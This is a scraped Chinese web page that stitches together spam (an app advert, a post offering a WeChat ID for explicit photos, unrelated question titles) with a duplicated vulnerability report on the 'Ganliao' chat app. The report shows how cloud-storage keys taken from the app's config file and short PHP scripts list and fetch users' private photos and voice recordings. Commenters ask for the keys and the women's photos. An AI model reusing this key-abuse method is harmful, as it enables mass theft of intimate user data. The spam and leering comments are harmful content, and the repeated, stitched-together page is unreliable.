敢聊怎么改看改照片像素的时间
点击联系发帖人
时间:2014-10-27 01:23
真人互动在线邀请 《敢聊》介绍
真人互动在线邀请 《敢聊》介绍
编辑:3533
来源:手机世界
《》一款真人互动的社交应用。真心话大冒险好玩刺激,大冒险的照片可阅后即焚。敢挑战的朋友们,一起来玩真心话大冒险吧。
游戏方式:
1、随机匹配
根据你们的地理位置和性别,给你随机匹配到帅哥和美女,你们1对1的进行真心话大冒险。
2、在线邀请
根据用户的头像,自我介绍,地理位置,你可以邀请你中意的帅哥美女和你一起来玩
3、微信好友
你还可以发出邀请给微信上自己的暧昧好友,一起加深感情。
1、真心话,一方问出一个真心话的问题,另一方用语音来回答。
2、大冒险,一方给出一个大冒险的要求,另一方用拍照证明自己做过了这件事情。照片在指定的时间内可以看到,之后就会自动消失。这样就不用担心自己的隐私被暴露啦!
PS:如果大家喜欢该款,可以使用【】进行下载。(操作简单便捷;拥有最具公信力的应用下载排行榜,贴心的装机必备,让你的手机更丰富更好用!)
支持平台:Android还没有开通你的开心账户?使用其他账号登录:
给他剪完毛不怎么理我了。。。。是不是生气了?[泪流满面]最近发现一个特内涵的妹纸,晚上跟她聊了好久,什么都敢聊来着[good]想找她的可以加她微信号:neihan2233,或者扫描下面的二维码也可以找到她哦~只要你敢要,没有她不敢给的照片[花心]
本转帖分类:&&&&
&&上一帖:
下一帖:&&
(%)点击发表你的观点
12-10 00:0512-10 00:1912-10 00:2312-10 00:2312-10 00:2312-10 00:2712-10 00:2712-10 00:2712-10 00:3612-10 00:43
热门转帖:
最新专题:
&2015 开心网分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
最近刚流行的“敢聊”APP应用中,用户的语音、照片资料泄漏
详细说明:
在APP的配置文件中保存了云存储(使用的是七牛)的APPKEY、APPSECRET和空间名称、空间域名,显然,有了这些东西,那么用户发送的所有资料,都一览无余。
漏洞证明:
第一、用ITOOLS等工具打开应用。
第二,打开com.ruoogle.gamechat.plist该文件,无法直视啊。。
code 区域空间地址:GC_Static = &http://[马赛克]./&;
第三、去七牛官网下载SDK,配置好。
code 区域PHP:
//照片列表
$rst = Qiniu_RSF_ListPrefix($client, $bucket,'photo/1','',1000);
var_dump($rst);
//音频列表
$rst = Qiniu_RSF_ListPrefix($client, $bucket,'audio','',1000);
var_dump($rst);
第四、运行
第五、测试,获取文件下载地址
code 区域PHP:
$key = isset($_GET['i']) ? $_GET['i'] : 'photo/10022/xxxxxx.jpg';
Qiniu_SetKeys($accessKey, $secretKey);
$baseUrl = Qiniu_RS_MakeBaseUrl($domain, $key);
$getPolicy = new Qiniu_RS_GetPolicy();
$privateUrl = $getPolicy-&MakeRequest($baseUrl, null);
echo '&img src=&'. $privateUrl .'& /&' . &\n&;
语音文件同理
PS. 遍历下载发现不少鲍照啊。。。。
修复方案:
我不会IOS开发,哈哈哈
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:18
确认时间: 19:17
厂商回复:
真的是非常感谢,已经修复!!!!
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
还有这个东西呀!
求打包妹子照片及语音
@M0nster 只是测试遍历了前1K条,淡定。
洞主求妹子照片和录音。
@.cn 你们的开发这个大意闹的有点的大啊。。如果用户多起来问题就更严重了。
@.cn 亲啊,重置下secretKey呗,我现在还能访问到呢。。。
@有妹子送上
语音数据都能获取,太牛逼了。
我去,获取的是云端的?为什么不搞点限制级的大家开心开心……
用客户端直接连接七牛api......不过七牛如果弄个只允许增加的子Secret其实也是不错的,这样的话对应用开发者比较友好....
求secretKey找妹子呀~
其实危害应该不大,APPKEY、APPSECRET等都是存在本机的,通常都是假定本机是安全的。当然文件有权限检查,稍微加个密处理啥的会更好。
共享啊我日
登录后才能发表评论,请先}
真人互动在线邀请 《敢聊》介绍
编辑:3533
来源:手机世界
《》一款真人互动的社交应用。真心话大冒险好玩刺激,大冒险的照片可阅后即焚。敢挑战的朋友们,一起来玩真心话大冒险吧。
游戏方式:
1、随机匹配
根据你们的地理位置和性别,给你随机匹配到帅哥和美女,你们1对1的进行真心话大冒险。
2、在线邀请
根据用户的头像,自我介绍,地理位置,你可以邀请你中意的帅哥美女和你一起来玩
3、微信好友
你还可以发出邀请给微信上自己的暧昧好友,一起加深感情。
1、真心话,一方问出一个真心话的问题,另一方用语音来回答。
2、大冒险,一方给出一个大冒险的要求,另一方用拍照证明自己做过了这件事情。照片在指定的时间内可以看到,之后就会自动消失。这样就不用担心自己的隐私被暴露啦!
PS:如果大家喜欢该款,可以使用【】进行下载。(操作简单便捷;拥有最具公信力的应用下载排行榜,贴心的装机必备,让你的手机更丰富更好用!)
支持平台:Android还没有开通你的开心账户?使用其他账号登录:
给他剪完毛不怎么理我了。。。。是不是生气了?[泪流满面]最近发现一个特内涵的妹纸,晚上跟她聊了好久,什么都敢聊来着[good]想找她的可以加她微信号:neihan2233,或者扫描下面的二维码也可以找到她哦~只要你敢要,没有她不敢给的照片[花心]
本转帖分类:&&&&
&&上一帖:
下一帖:&&
(%)点击发表你的观点
12-10 00:0512-10 00:1912-10 00:2312-10 00:2312-10 00:2312-10 00:2712-10 00:2712-10 00:2712-10 00:3612-10 00:43
热门转帖:
最新专题:
&2015 开心网分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向第三方安全合作伙伴开放
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
最近刚流行的“敢聊”APP应用中,用户的语音、照片资料泄漏
详细说明:
在APP的配置文件中保存了云存储(使用的是七牛)的APPKEY、APPSECRET和空间名称、空间域名,显然,有了这些东西,那么用户发送的所有资料,都一览无余。
漏洞证明:
第一、用ITOOLS等工具打开应用。
第二,打开com.ruoogle.gamechat.plist该文件,无法直视啊。。
code 区域空间地址:GC_Static = &http://[马赛克]./&;
第三、去七牛官网下载SDK,配置好。
code 区域PHP:
//照片列表
$rst = Qiniu_RSF_ListPrefix($client, $bucket,'photo/1','',1000);
var_dump($rst);
//音频列表
$rst = Qiniu_RSF_ListPrefix($client, $bucket,'audio','',1000);
var_dump($rst);
第四、运行
第五、测试,获取文件下载地址
code 区域PHP:
$key = isset($_GET['i']) ? $_GET['i'] : 'photo/10022/xxxxxx.jpg';
Qiniu_SetKeys($accessKey, $secretKey);
$baseUrl = Qiniu_RS_MakeBaseUrl($domain, $key);
$getPolicy = new Qiniu_RS_GetPolicy();
$privateUrl = $getPolicy-&MakeRequest($baseUrl, null);
echo '&img src=&'. $privateUrl .'& /&' . &\n&;
语音文件同理
PS. 遍历下载发现不少鲍照啊。。。。
修复方案:
我不会IOS开发,哈哈哈
版权声明:转载请注明来源 @
厂商回应:
危害等级:高
漏洞Rank:18
确认时间: 19:17
厂商回复:
真的是非常感谢,已经修复!!!!
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
还有这个东西呀!
求打包妹子照片及语音
@M0nster 只是测试遍历了前1K条,淡定。
洞主求妹子照片和录音。
@.cn 你们的开发这个大意闹的有点的大啊。。如果用户多起来问题就更严重了。
@.cn 亲啊,重置下secretKey呗,我现在还能访问到呢。。。
@有妹子送上
语音数据都能获取,太牛逼了。
我去,获取的是云端的?为什么不搞点限制级的大家开心开心……
用客户端直接连接七牛api......不过七牛如果弄个只允许增加的子Secret其实也是不错的,这样的话对应用开发者比较友好....
求secretKey找妹子呀~
其实危害应该不大,APPKEY、APPSECRET等都是存在本机的,通常都是假定本机是安全的。当然文件有权限检查,稍微加个密处理啥的会更好。
共享啊我日
登录后才能发表评论,请先}
我要回帖
更多关于 改照片像素 的文章
更多推荐
- ·龙腾世纪的推荐配置对处理器有玩大型网游什么配置的电脑要求?
- ·目前考虑购买复古木质做音箱用什么木材最好,ALATS和马歇尔哪个品牌更适合中国家庭?
- ·FC24这是什么意思怎么是两个控制器故障代码如何还原?
- ·那种直播间字幕怎么弄烟花改字的视频怎么弄?
- ·立创广场商城最近有什么大活动吗?
- ·红米锁屏效果1S有没有快捷方便的锁屏?
- ·OA=40cm60cm的项链,O1B=60cm,M1=100N.m求M2
- ·钟放在家中养什么鱼好什么位置好
- ·关于影视特效公司和渲染师的问题,哪个工作相对稳定?
- ·少林很忙 txt在线阅读
- ·买惠普华硕笔记本装系统电脑在一年内会免费装系统吗
- ·罗汉果泡水喝的副作用比例是多少
- ·淘宝客怎么推广推广
- ·有什么办法可以快速的将一个矩阵的数据从上位机(PC)通过发送到单片机上位机软件中去
- ·问在澳洲归国礼品店里购买的澳洲保健品三大品牌,和在澳洲药店里购买的澳洲保健品三大品牌有什么区别?
- ·泸县一中福集哪里有2g数据卡,我手机用的流量比较大,用什么卡实惠
- ·谁知道哪里有RC3102微宏刻字机驱动下载?
- ·步步高vivox5报价为什么收不到微信短信等消息
- ·谁有怎么看片不用播放器器就能看片的网站
- ·卫生间渗水淋浴区域有渗水到楼下的现象怎么补救
- ·敢聊怎么改看改照片像素的时间
- ·红豆杉旧木柱子,直径30CM以上,长4M,一根柱子的大厅价值多少?准备出售
- ·为什么曾彭飚真二胡唱吧主页背景在主页动,在空间就不动了
- ·三星w 999为什么看视频需要进网站
- ·我的会影X5过ps试用期过了怎么办了,怎么办呀,重新下载安装也不行,那位大神能帮帮我吗
- ·万象长沙沃美影城城十月二十七日影片节目表
- ·红米手机黑屏进网片突然黑屏来不了机是什么问题
- ·e240 显示service cservice是什么意思思
- ·腾讯视频播放器无法播放缓存视频显示122.201
- ·为什么子网页打不开?改网子了?
- ·刚二十岁的小姑娘去百合网线下服务中心报名怎么找对象象 ,有戏么?
- ·红米noet电信版移动4g版!要唤醒手机才可以收到微信
- ·两台电脑最新笔记本电脑配置一样配置一样品牌,当是一台电脑cpu是2.5G另一台电脑cpu是1.9G,两台电脑内
- ·暴风影音的美剧没有了影视库没有了这是怎么回事啊
- ·怎么理解沉默是金 简谱?尚善之家创始人张中蕴先生问?感谢网友的回答?
- ·微信里有启动麦克风没有声音为什么没有麦克风没有声音的标记
